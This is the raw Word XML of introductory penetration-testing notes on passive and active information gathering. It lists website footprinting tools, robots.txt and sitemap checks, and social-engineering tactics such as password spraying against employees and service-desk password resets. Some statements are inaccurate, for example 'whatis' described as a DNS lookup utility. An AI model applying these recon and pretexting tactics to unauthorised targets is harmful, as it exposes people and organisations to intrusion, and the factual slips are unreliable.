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E00C" w14:textId="404C4F0D" w:rsidR="009B6F31" w:rsidRPr="002A77BD" w:rsidRDefault="00236C71" w:rsidP="00236C71">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00344E70" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ENETRATION TESTING NOTES COMPENDIUM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4954D63D" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64E0CFFC" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>INFORMATION GATHERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F97E13F" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A8FA8A" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Introduction to Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA05302" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Passive Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9D2328" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing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Active Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595A8E8B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021B629C" w14:textId="2BB7D0E1"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softHyphen/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:softHyphen/>
        <w:t xml:space="preserve">- Learn the difference between active and passive information </w:t>
      </w:r>
      <w:r w:rsidR="00661643" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>gathering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA2B4AA" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Information gathering is the first step of any penetration test and involves fathering or collecting information about an individual, company, website, or system that you are targeting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF9CE3A" w14:textId="54A086CF" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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The more information you have on your target, the more successful you will be during the latter stages of a penetration test</w:t>
      </w:r>
      <w:r w:rsidR="00D615B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D696A33" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Information gathering is typically broken down into two parts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101C0C49" w14:textId="2D60A8EA" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>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Active info gathering – Interact directly with host, need authorization in a pen test</w:t>
      </w:r>
      <w:r w:rsidR="00D615B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0FF343" w14:textId="703CDA31" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing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Passive info gathering – Publicly accessible info</w:t>
      </w:r>
      <w:r w:rsidR="00D615B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F4014B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E27DAD"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What information are we looking for?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FC311D"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u w:val="single"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Passive Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF4E226" w14:textId="4146E53F"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Identifying IP addresses &amp; DNS information</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>+ Identifying domain names and domain ownership information</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>+ Identifying email addresses and social media profiles</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>+ Identifying web technologies being used on target sites</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>+ Identifying subdomains</w:t>
      </w:r>
      <w:r w:rsidR="0079171B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0994C9FD"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u w:val="single"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Active Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C159DE4" w14:textId="2651BFFA" w:rsidR="00344E70"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Discovering open ports on target systems</w:t>
      </w:r>
      <w:r w:rsidR="00022E1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>+ Learning about the internal infrastructure of a target network/organization</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>+ Enumerating info</w:t>
      </w:r>
      <w:r w:rsidR="00AD027F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> by probing </w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>target systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0DA8A7" w14:textId="612BC5BA" w:rsidR="00673F81" w:rsidRDefault="00673F81" w:rsidP="00344E70">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F57F70">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Engaging with </w:t>
      </w:r>
      <w:r w:rsidR="00022E1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>employees</w:t>
      </w:r>
      <w:r w:rsidR="00F57F70">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> for password spraying</w:t>
      </w:r>
      <w:r w:rsidR="00A92E8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F933D1F" w14:textId="6B513B03" w:rsidR="00022E1C" w:rsidRPr="002A77BD" w:rsidRDefault="00022E1C" w:rsidP="00344E70">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Calling the IT service desk to reset an account password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54570965"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F751C0C" w14:textId="23DEB867" w:rsidR="00AA1642" w:rsidRPr="002A77BD" w:rsidRDefault="00AA1642" w:rsidP="00AA1642">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>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PASSIVE RECON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38990352" w14:textId="77777777" w:rsidR="00AA1642" w:rsidRPr="002A77BD" w:rsidRDefault="00AA1642" w:rsidP="00AA1642">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A10522B"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b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Website Recon &amp; Footprinting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2CF35E"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What are some items we can look for?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A813C63" w14:textId="4998A8AC"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IP addresses</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>+ Directories hidden from search engines</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>+ Names</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>+ Email addresses</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>+ Phone Numbers</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>+ Physical Addresses</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">+ Web technologies being </w:t>
      </w:r>
      <w:r w:rsidR="00661643" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF65046" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing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Website could be hosted behind a proxy (Cloudflare, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76724AA5"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lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A68525"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whatis – DNS lookup utility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244E90D1" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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The website does not necessarily know what to do with a domain name once it receives it, as it needs to resolve an IP address to that domain. (in order to communicate with that web server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75167A7D" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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If a web server is mapped to multiple different IP addresses, it could mean that the web server is being hosted behind a proxy!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A660212" w14:textId="291648BE" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing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Displays IPv4 &amp; I</w:t>
      </w:r>
      <w:r w:rsidR="00AA1642" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>v6 info, as well as domain name for mail server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366A65B3" w14:textId="0881E7C8" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00AA1642"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W</w:t>
      </w:r>
      <w:r w:rsidR="00344E70" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>hatweb – Perform stealth scans of a website and display web technologies, including headers and scripting languages, a lot of info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACC52EE"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Web HTTRack – Website Copier: Allows you to download a website from the Internet to a local directory. Will build the website recursively and display any subdomains and other web technologies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B963233" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Available on the web and as a Linux executable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C10C224" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing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Useful for analyzing source code from a website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F4C368"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF94EEF"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Website Scouring – Look for any names including social media, alternate websites, subdomains, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60562514"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robots.txt – A text file that contains different entries, almost every website has it; if a website does not have it then they are potentially doing something wrong.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D94CA6" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0"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It essentially allows the user to specify which folder or files they do not want to have search engines index. (Search engines can potentially reveal directories that should not be revealed to the public)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225E7B16" w14:textId="5AEC51E6" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00661643" w:rsidP="00344E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing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Generally,</w:t>
      </w:r>
      <w:r w:rsidR="00344E70" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to restrict visibility to directories of importance, such as administrative logins or management pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA4BB5C" w14:textId="3C9E30CB" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00AA1642"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S</w:t>
      </w:r>
      <w:r w:rsidR="00344E70" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>itemap(s).xml – A file, typically .xml, to essentially provide search engines with an organized way to index the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B46D05" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="233" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Always look out for categories hidden on WordPress sites!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC74649" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:p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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E046D2" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Firefox extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08063F5D" w14:textId="77777777" w:rsidR="006C1146" w:rsidRPr="002A77BD" w:rsidRDefault="006C1146" w:rsidP="00344E70">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5509BA22" w14:textId="38062619" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="006C1146">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:num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BuiltWith (LIMITED FOR FREE USERS) – Technology profiler, will tell you what web technologies or content management systems are running on that website. (widgets, plugins, web frameworks, subdomains, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71368E01" w14:textId="0BD54A7B" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="006C1146">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
